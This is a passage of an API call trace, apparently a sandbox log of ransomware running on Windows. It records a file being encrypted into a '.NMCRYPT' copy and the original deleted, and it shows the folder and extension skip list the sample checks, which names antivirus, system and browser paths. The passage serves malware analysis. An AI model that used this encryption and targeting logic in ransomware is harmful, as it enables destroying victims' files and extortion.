hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.060] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.060] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.060] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0157.060] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.060] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad8b8) returned 1 [0157.060] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.060] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.060] wcslen (_String="\\\\?\\") returned 0x4 [0157.060] CryptDuplicateKey (in: hKey=0x9ad8b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad7b8) returned 1 [0157.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.061] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=617) returned 1 [0157.061] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.061] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.063] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.063] GetLastError () returned 0x0 [0157.063] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.064] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.064] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.064] GetLastError () returned 0x0 [0157.064] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.064] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x69, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x69, lpOverlapped=0x0) returned 1 [0157.064] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x69, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x70) returned 1 [0157.064] GetLastError () returned 0x0 [0157.064] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x70, lpOverlapped=0x0) returned 1 [0157.064] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.064] WriteFile (in: hFile=0x588, lpBuffer=0x607e18*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml")) returned 0x20 [0157.064] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml", dwFileAttributes=0x20) returned 0 [0157.064] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 1 [0157.064] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml")) returned 0 [0157.065] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" [0157.065] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0157.065] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8C4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8c4.tmp")) returned 0xd8c4 [0157.066] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8C4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8c4.tmp"), dwFlags=0x1) returned 0 [0157.066] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8C4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8c4.tmp")) returned 1 [0157.066] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0157.066] wcslen (_String="OK") returned 0x2 [0157.066] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.066] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.066] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0157.066] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0157.066] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0157.066] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*NMCRYPT") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*Recovers your files.html") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*.exe") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*.dll") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*.lnk") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*.bat") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*.ini") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*.msi") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*.scf") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*pagefile.sys*") returned 0 [0157.066] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*AppData*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\winrar\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\java\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\windows\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\ESET\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\AVG\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*Atheros*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*Realtek*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*bootmgr*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*boot*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*boot*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*IO.SYS*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*ntldr*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*chrome*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*opera*") returned 0 [0157.067] PathMatchSpecW (pszFile="ja-jp.xml", pszSpec="*firefox*") returned 0 [0157.067] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml", pszSpec="*") returned 1 [0157.067] strlen (_Str="NMoreira") returned 0x8 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] 